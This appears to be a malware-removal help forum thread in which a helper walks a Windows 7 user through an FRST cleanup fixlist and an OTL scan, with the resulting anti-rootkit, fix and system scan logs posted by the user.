Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.17358
Ryan :: RYAN-PC [administrator]
11/7/2014 6:24:49 PM
mbar-log-2014-11-07 (18-24-49).txt
Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 407325
Time elapsed: 9 minute(s), 56 second(s)
Memory Processes Detected: 0
(No malicious items detected)
Memory Modules Detected: 0
(No malicious items detected)
Registry Keys Detected: 0
(No malicious items detected)
Registry Values Detected: 0
(No malicious items detected)
Registry Data Items Detected: 0
(No malicious items detected)
Folders Detected: 0
(No malicious items detected)
Files Detected: 0
(No malicious items detected)
Physical Sectors Detected: 0
(No malicious items detected)
(end)
---------------------------------------
Malwarebytes Anti-Rootkit BETA 1.08.0.1001
(c) Malwarebytes Corporation 2011-2012
OS version: 6.1.7601 Windows 7 Service Pack 1 x64
Account is Administrative
Internet Explorer version: 11.0.9600.17358
File system is: NTFS
Disk drives: C:\ DRIVE_FIXED
CPU speed: 2.294000 GHz
Memory total: 8478728192, free: 6701981696
Downloaded database version: v2014.11.07.06
Downloaded database version: v2014.11.01.02
=======================================
Initializing...
------------ Kernel report ------------
11/07/2014 18:24:40
------------ Loaded modules -----------
\SystemRoot\system32\ntoskrnl.exe
\SystemRoot\system32\hal.dll
\SystemRoot\system32\kdcom.dll
\SystemRoot\system32\mcupdate_GenuineIntel.dll
----------- End -----------
Done!
<<<1>>>
Upper Device Name: \Device\Harddisk0\DR0
Upper Device Object: 0xfffffa8007a9f790
Upper Device Driver Name: \Driver\Disk\
Lower Device Name: \Device\Ide\IAAStorageDevice-0\
Lower Device Object: 0xfffffa80076da050
Lower Device Driver Name: \Driver\iaStor\
<<<2>>>
Physical Sector Size: 512
Drive: 0, DevicePointer: 0xfffffa8007a9f790, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
--------- Disk Stack ------
DevicePointer: 0xfffffa8007a9f2c0, DeviceName: Unknown, DriverName: \Driver\partmgr\
DevicePointer: 0xfffffa8007a9f790, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
DevicePointer: 0xfffffa80074f1660, DeviceName: Unknown, DriverName: \Driver\ACPI\
DevicePointer: 0xfffffa80076da050, DeviceName: \Device\Ide\IAAStorageDevice-0\, DriverName: \Driver\iaStor\
------------ End ----------
Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\Disk\
Upper DeviceData: 0x0, 0x0, 0x0
Lower DeviceData: 0x0, 0x0, 0x0
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
<<<2>>>
<<<3>>>
Volume: C:
File system type: NTFS
SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
Done!
Drive 0
This is a System drive
Scanning MBR on drive 0...
Inspecting partition table:
MBR Signature: 55AA
Disk Signature: 868B7EFA
Partition information:
Partition 0 type is Other (0x27)
Partition is ACTIVE.
Partition starts at LBA: 2048 Numsec = 1228800
Partition file system is NTFS
Partition is bootable
Partition 1 type is Primary (0x7)
Partition is NOT ACTIVE.
Partition starts at LBA: 1230848 Numsec = 1927714816
Partition 2 type is Other (0x27)
Partition is NOT ACTIVE.
Partition starts at LBA: 1928945664 Numsec = 24576000
Partition 3 type is Empty (0x0)
Partition is NOT ACTIVE.
Partition starts at LBA: 0 Numsec = 0
Disk Size: 1000204886016 bytes
Sector size: 512 bytes
Done!
Scan finished
=======================================
Removal queue found; removal started
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-2048-i.mbam...
Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
Removal finished
Is the version of Spybot on your machine the free version?
At this time I would like to ask that you uninstall SpyBot in case it's preventing changes I script in here and to ensure the removal of bad entries.
Open notepad. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy.
Paste this into the open notepad. Save it to the Desktop as fixlist.txt
NOTE. It's important that both files, FRST/FRST64 and fixlist.txt, are in the same location or the fix will not work.
It needs to be saved next to the "Farbar Recovery Scan Tool" (If asked to overwrite existing one please allow)
start
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
C:\Users\Ryan\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Ryan\AppData\Local\Temp\Quarantine.exe
EmptyTemp:
Hosts:
End
Open FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
~~~~~~~~~~~~~~~~~
Download OTL (http://oldtimer.geekstogo.com/OTL.exe) to your desktop.
Double click on the icon to run it.
Make sure all other windows are closed and let it run uninterrupted.
https://dl.dropbox.com/u/73555776/OTL_Main_Tutorial.gif
Select All Users.
Under the Custom Scan box paste this text in bold in
netsvcs
BASESERVICES
%SYSTEMDRIVE%\*.exe
/md5start
services.*
explorer.exe
winlogon.exe
Userinit.exe
svchost.exe
winsock.*
/md5stop
CREATERESTOREPOINT
Click the Run Scan button. Do not change any settings unless otherwise told to do so. The scan won't take long.
When the scan completes, it will open two notepad windows: OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
Post both logs. DO NOT ATTACH THEM.
ascot1340
2014-11-08, 21:56
Should I check the "LOP Check" and "Purity Check" boxes as is indicated on your image or leave them unchecked?
At this time the below is really all I need.
Under the Custom Scan box paste this text in bold in
netsvcs
BASESERVICES
%SYSTEMDRIVE%\*.exe
/md5start
services.*
explorer.exe
winlogon.exe
Userinit.exe
svchost.exe
winsock.*
/md5stop
ascot1340
2014-11-09, 22:47
I keep getting an HTTP 500 Internal Server Error "the website cannot display the page" message when I try to post the logs. I'll attempt to paste them in separate posts and see if that helps. Here is the FRST log:
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 08-11-2014 01
Ran by Ryan at 2014-11-08 13:01:05 Run:2
Running from C:\Users\Ryan\Desktop
Loaded Profiles: UpdatusUser & Ryan (Available profiles: UpdatusUser & Ryan)
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
start
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
C:\Users\Ryan\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Ryan\AppData\Local\Temp\Quarantine.exe
EmptyTemp:
Hosts:
End
*****************
Processes closed successfully.
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
"HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
C:\Users\Ryan\AppData\Local\Temp\dllnt_dump.dll => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\Quarantine.exe => Moved successfully.
C:\Windows\System32\Drivers\etc\hosts => Moved successfully.
Hosts was reset successfully.
EmptyTemp: => Removed 485.5 MB temporary data.
The system needed a reboot.
==== End of Fixlog ====
ascot1340
2014-11-09, 22:52
Here is the OTL log in pieces:
OTL logfile created on: 11/8/2014 9:01:25 PM - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Ryan\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17358)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
7.90 Gb Total Physical Memory | 6.56 Gb Available Physical Memory | 83.07% Memory free
15.79 Gb Paging File | 13.87 Gb Available in Paging File | 87.86% Paging File free
Paging file location(s): ?:\pagefile.sys
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 919.21 Gb Total Space | 829.55 Gb Free Space | 90.25% Space Free | Partition Type: NTFS
Computer Name: RYAN-PC | User Name: Ryan | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
========== Processes (SafeList) ==========
PRC - [2014/11/08 14:48:11 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Ryan\Desktop\OTL.exe
PRC - [2014/09/04 04:50:02 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2013/09/12 11:06:22 | 001,337,752 | ---- | M] (ESET) -- C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
PRC - [2013/02/15 17:23:34 | 014,731,776 | ---- | M] (GARMIN Corp.) -- C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe
PRC - [2012/11/12 20:30:54 | 000,066,560 | ---- | M] (Nalpeiron Ltd.) -- C:\Windows\SysWOW64\nlssrv32.exe
PRC - [2012/05/01 04:36:40 | 005,406,104 | ---- | M] (Sentelic Corporation) -- C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe
PRC - [2012/03/28 09:36:56 | 000,363,800 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
PRC - [2012/03/28 09:36:54 | 000,277,784 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
PRC - [2012/03/28 09:36:50 | 000,128,280 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
PRC - [2012/03/28 09:36:38 | 000,165,144 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
PRC - [2012/03/14 22:59:00 | 002,458,944 | ---- | M] (NVIDIA Corporation) -- C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
PRC - [2012/02/26 11:01:56 | 000,291,608 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
========== Modules (No Company Name) ==========
MOD - [2014/01/20 13:17:04 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2014/01/20 13:16:38 | 001,044,808 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2012/05/03 16:56:44 | 000,089,600 | ---- | M] () -- C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspLib.dll
MOD - [2012/05/03 11:48:16 | 000,093,696 | ---- | M] () -- C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\move_ctrl.dll
MOD - [2012/04/20 18:11:32 | 000,034,816 | ---- | M] () -- C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\KbdHook.dll
MOD - [2012/03/15 12:19:26 | 000,241,664 | ---- | M] () -- C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\vCapture.dll
========== Services (SafeList) ==========
SRV:64bit: - [2014/09/18 20:25:49 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2014/08/22 14:14:34 | 000,368,624 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2014/08/22 14:14:34 | 000,023,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2013/09/12 11:06:22 | 001,337,752 | ---- | M] (ESET) [Auto | Running] -- C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe -- (ekrn)
SRV:64bit: - [2013/05/27 00:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2012/03/07 04:00:46 | 000,629,984 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- c:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel(R)
SRV:64bit: - [2010/11/11 17:00:32 | 000,467,696 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Zune\ZuneWlanCfgSvc.exe -- (ZuneWlanCfgSvc)
SRV:64bit: - [2010/11/11 17:00:32 | 000,306,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Zune\WMZuneComm.exe -- (WMZuneComm)
SRV:64bit: - [2010/11/11 16:59:36 | 008,251,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Zune\ZuneNss.exe -- (ZuneNetworkSvc)
SRV:64bit: - [2010/09/22 20:10:10 | 000,057,184 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Mesh\wlcrasvc.exe -- (wlcrasvc)
SRV - [2014/11/08 13:05:25 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/09/04 04:50:02 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/03/20 17:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/09/11 21:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2012/11/12 20:30:54 | 000,066,560 | ---- | M] (Nalpeiron Ltd.) [Auto | Running] -- C:\Windows\SysWOW64\nlssrv32.exe -- (nlsX86cc)
SRV - [2012/05/14 20:35:25 | 000,276,248 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2012/03/28 09:36:56 | 000,363,800 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2012/03/28 09:36:54 | 000,277,784 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2012/03/28 09:36:50 | 000,128,280 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe -- (Intel(R)
SRV - [2012/03/28 09:36:38 | 000,165,144 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe -- (jhi_service)
SRV - [2012/03/14 22:59:00 | 002,458,944 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe -- (nvUpdatusService)
SRV - [2012/02/13 13:24:48 | 000,106,144 | ---- | M] (Atheros Commnucations) [Auto | Running] -- C:\Program Files (x86)\Bluetooth Suite\AdminService.exe -- (AtherosSvc)
========== Driver Services (SafeList) ==========
DRV:64bit: - [2014/11/03 18:14:27 | 000,034,808 | ---- | M] () [Kernel | On_Demand | Unknown] -- C:\Windows\SysNative\drivers\TrueSight.sys -- (TrueSight)
DRV:64bit: - [2014/07/17 17:05:06 | 000,125,584 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:64bit: - [2014/04/15 16:22:10 | 000,013,344 | ---- | M] (Rsupport Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\vrvd5.sys -- (vrvd5)
DRV:64bit: - [2014/04/11 00:02:54 | 000,156,360 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ESETOlmarikOlmascoCleaner.sys -- (ESETOlmarikOlmascoCleaner)
DRV:64bit: - [2013/11/26 04:07:12 | 000,011,576 | ---- | M] (Samsung Electronics) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\SSPORT.SYS -- (SSPORT)
DRV:64bit: - [2012/12/13 12:50:36 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:64bit: - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:64bit: - [2012/05/10 10:11:02 | 014,759,136 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2012/04/02 15:29:42 | 000,035,840 | ---- | M] (Cirrus Logic) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\CSLFDx64.sys -- (CirrusLFD)
DRV:64bit: - [2012/03/14 22:59:00 | 000,028,992 | ---- | M] (NVIDIA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\nvpciflt.sys -- (nvpciflt)
DRV:64bit: - [2012/03/07 18:43:08 | 000,014,336 | ---- | M] (Primax Electronics Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ViWDM.sys -- (ViWDM)
DRV:64bit: - [2012/03/01 20:17:24 | 003,545,088 | ---- | M] (Qualcomm Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athrx.sys -- (athr)
DRV:64bit: - [2012/03/01 01:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2012/02/26 14:01:00 | 000,788,760 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iusb3xhc.sys -- (iusb3xhc)
DRV:64bit: - [2012/02/26 14:01:00 | 000,356,120 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iusb3hub.sys -- (iusb3hub)
DRV:64bit: - [2012/02/26 14:01:00 | 000,016,152 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iusb3hcs.sys -- (iusb3hcs)
DRV:64bit: - [2012/02/13 13:34:12 | 000,550,560 | ---- | M] (Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btfilter.sys -- (BtFilter)
DRV:64bit: - [2012/02/13 13:33:24 | 000,280,992 | ---- | M] (Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_rcp.sys -- (BTATH_RCP)
DRV:64bit: - [2012/02/13 13:33:12 | 000,068,256 | ---- | M] (Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_lwflt.sys -- (BTATH_LWFLT)
DRV:64bit: - [2012/02/13 13:32:42 | 000,167,584 | ---- | M] (Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_hcrp.sys -- (BTATH_HCRP)
DRV:64bit: - [2012/02/13 13:32:24 | 000,036,000 | ---- | M] (Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_flt.sys -- (AthBTPort)
DRV:64bit: - [2012/02/13 13:32:12 | 000,030,368 | ---- | M] (Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_bus.sys -- (BTATH_BUS)
DRV:64bit: - [2012/02/13 13:31:54 | 000,110,752 | ---- | M] (Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_avdt.sys -- (btath_avdt)
DRV:64bit: - [2012/02/13 13:31:42 | 000,339,616 | ---- | M] (Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_a2dp.sys -- (BTATH_A2DP)
DRV:64bit: - [2012/02/03 08:01:20 | 000,677,480 | ---- | M] (Realtek ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2012/02/01 03:16:40 | 000,568,600 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)
DRV:64bit: - [2011/11/09 12:04:14 | 000,060,184 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:64bit: - [2011/08/17 01:27:06 | 000,251,496 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\RtsUStor.sys -- (RSUSBSTOR)
DRV:64bit: - [2011/05/17 15:44:46 | 000,044,480 | ---- | M] (http://libusb-win32.sourceforge.net) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\libusb0.sys -- (libusb0)
DRV:64bit: - [2011/03/11 01:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/11 01:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2011/02/16 16:53:00 | 000,014,464 | ---- | M] (Western Digital Technologies) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wdcsam64.sys -- (WDC_SAM)
DRV:64bit: - [2010/11/20 22:24:33 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2010/11/20 22:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/20 22:23:47 | 000,031,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2009/07/13 20:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 20:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 20:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/07/13 18:21:48 | 000,038,400 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)
DRV:64bit: - [2009/06/10 15:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 15:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/10 15:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 15:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV - [2009/07/13 20:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
========== Standard Registry (SafeList) ==========
========== Internet Explorer ==========
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope =
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope =
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope =
IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope =
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 76 D3 6B 0F 2F C9 CC 01 [binary data]
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\..\SearchScopes,DefaultScope =
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = Preserve
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 7E F7 8E 2F 6E F8 CF 01 [binary data]
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local
========== FireFox ==========
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
